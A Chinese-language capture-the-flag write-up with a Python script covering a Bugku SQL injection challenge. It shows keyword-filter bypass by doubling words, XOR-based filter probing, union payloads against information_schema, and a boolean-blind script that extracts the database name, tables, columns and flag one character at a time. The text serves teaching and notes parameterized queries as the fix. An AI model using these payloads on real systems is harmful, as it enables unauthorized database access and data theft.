網址:http://123.206.87.240:9004/1ndex.php?id=1
前言:bugku中一道涉及多次注入的題
1、異或注入(判斷字符是否被過濾)
0X00 很明顯 注入點在id上

參數id只有5個,等於6的時候顯示Error

測試1 id=1' or 1=1#
返回錯誤,猜測可能有字符被過濾
測試2 id=1' oorr 1=1--+
返回正常結果,說明可以通過雙寫繞過:過濾器應該只把關鍵字刪除一次,oorr 中間的 or 被刪掉後,剩下的字符又拼成了 or。這也說明一次性刪除關鍵字的黑名單並不能修補注入點,根本的修復是使用參數化查詢。
0X01:異或注入
那么在這種情況下該怎么檢測哪些字符被過濾??
異或注入:
id=1'^(length('被測試字符')=0)--+
例如:id=1'^(length('select')=0)--+ 發現返回錯誤
因為select被過濾(刪除),length('select')實際變成length(''),結果等於0,所以(length('')=0)成立,返回值為1,再和1異或結果為0,頁面返回錯誤;反之,沒有被過濾的字符串長度不為0,等式不成立,返回值為0,和1異或結果為1,頁面返回正常
檢測出select、and 、or被過濾
注意:information中也含有or,所以information_schema要寫成infoorrmation_schema(見下面的payload)
0X02:查數據庫、表、信息
列數:http://123.206.87.240:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23
顯示2

數據表:http://123.206.87.240:9004/1ndex.php?id=1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

0X03:下一關


這一關我是用bool盲注,根據返回頁面中有沒有hello,判斷對錯
直接附上代碼:
#coding=utf-8
import requests
#url='http://123.206.87.240:9004/Once_More.php?id=1'
#temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
#(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),{0},1)={1}%23'
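# Boolean-based blind injection (not error-based): a true condition returns a page containing Hello, a false one returns nobady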
def getdblen():
    """Probe the length of the current database name, one guess per request.

    Sends ``length(database())=<guess>`` through the ``id`` parameter for
    guess = 1..29 and stops at the first response whose body contains
    ``Hello``, the marker the page shows when the injected condition is
    true. The value is printed, not returned.

    A probe of this kind depends on the ``id`` value reaching the SQL
    statement unparameterized; with a bound parameter there is no
    true/false signal to read.
    """
    prefix = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(database())='
    for guess in range(1, 30):
        response = requests.get(prefix + str(guess) + '%23')
        if 'Hello' not in response.text:
            continue
        # NOTE: the label says "table len", but the value printed is the
        # length of the database name.
        print("table len:", guess)
        break
def getdb():
    """Recover the current database name one character at a time.

    For positions 1..9, each entry of the candidate alphabet is compared
    against ``mid(database(), position, 1)``; a response containing
    ``Hello`` means the comparison was true, so that character is kept and
    the next position is tried. Progress is printed after every hit.

    NOTE(review): the listing lost its indentation; the final print is
    assumed to run once, after both loops.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
    recovered = ''
    for position in range(1, 10):
        for candidate in charset:
            # mid() picks out the single character under test.
            probe = "http://123.206.87.240:9004/Once_More.php?id=1%27and%20mid(database(),"+str(position)+",1)=%27"+candidate+"%27%23"
            response = requests.get(probe)
            if 'Hello' in response.text:
                recovered += candidate
                print(recovered)
                break
    # NOTE: the label says "table name", but the value is the database name.
    print("table name is:", recovered)
def gettable():
    """Recover table names of the current database, character by character.

    For row offsets 1..19 (``limit <row>,1``) and character positions
    1..29, each candidate is compared with ``mid(<table_name>, position, 1)``.
    A response containing ``Hello`` marks a true comparison. Matched
    characters from every row are appended to one string with no
    separator, and the running value is printed after each hit.

    NOTE(review): the listing lost its indentation; the final print is
    assumed to run once, after all three loops.
    """
    dbname = 'web1002-2'
    charset = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
    endpoint = "http://123.206.87.240:9004/Once_More.php"
    recovered = ''
    # The bare string below is a disabled table-length probe; it is never
    # executed and is the only place ``dbname`` is mentioned.
    '''
for i in range(1,50): #數據表長度
url="http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27"+dbname+"%27)="+str(i)+"%23"
s = requests.get(url)
if 'Hello' in s.text:
print("table len:",i)
break
'''
    for row in range(1, 20):
        for position in range(1, 30):
            for candidate in charset:
                # requests URL-encodes the parameter value, so the payload
                # is written in plain SQL here.
                query = {'id': "1' and mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'#" % (row, position, candidate)}
                response = requests.get(endpoint, params=query)
                if 'Hello' in response.text:
                    recovered += candidate
                    print(recovered)
                    break
    print("table name :", recovered)
#limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
#payload = {'id':"1' and mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'#"%(i,j,k)}
def getcolumn():
    """Recover the column names of table ``flag2``, character by character.

    For row offsets 0..9 (``limit <row>,1``) and character positions
    1..19, each candidate is compared with
    ``mid(<column_name>, position, 1)``; a response containing ``Hello``
    marks a true comparison. Matches from all rows are appended to a
    single string with no separator.

    NOTE(review): the listing lost its indentation; the final print is
    assumed to run once, after all three loops.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
    endpoint = "http://123.206.87.240:9004/Once_More.php"
    recovered = ''
    for row in range(0, 10):
        for position in range(1, 20):
            for candidate in charset:
                query = {'id': "1' and mid((select column_name from information_schema.columns where table_name='flag2' limit %s,1),%s,1)='%s'#" % (row, position, candidate)}
                response = requests.get(endpoint, params=query)
                if 'Hello' in response.text:
                    recovered += candidate
                    print(recovered)
                    break
    print("column name:", recovered)
def getflag():
    """Read column ``flag2`` of table ``flag2`` one character at a time.

    For positions 1..34, each candidate is compared with
    ``mid((select flag2 from flag2), position, 1)``; a response containing
    ``Hello`` marks a true comparison and the character is appended.

    Every position costs up to one request per alphabet entry, and those
    requests differ only in a single quoted character, so a run appears in
    the server's access log as a long burst of near-identical ``id``
    values.

    NOTE(review): the listing lost its indentation; the final print is
    assumed to run once, after both loops.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~"
    endpoint = "http://123.206.87.240:9004/Once_More.php"
    recovered = ''
    for position in range(1, 35):
        for candidate in charset:
            query = {'id': "1' and mid((select flag2 from flag2),%s,1)='%s'#" % (position, candidate)}
            response = requests.get(endpoint, params=query)
            if 'Hello' in response.text:
                recovered += candidate
                print(recovered)
                break
    print("flag :", recovered)
if __name__ == '__main__':
    # The stages are run by hand, one at a time; only the last is enabled.
    # (The first disabled call names gettablelen, which this listing does
    # not define; the length probe here is getdblen.)
    # gettablelen()
    # getdb()
    # gettable()
    # getcolumn()
    getflag()
還有一種回顯的方法
爆數據庫名:
0Xff:總結
這題貌似還有第三關,懶得做了。這次主要是學習了用異或注入查哪些字符被過濾;還有一種方法是使用burpsuite查過濾規則,不曉得這里能不能用。
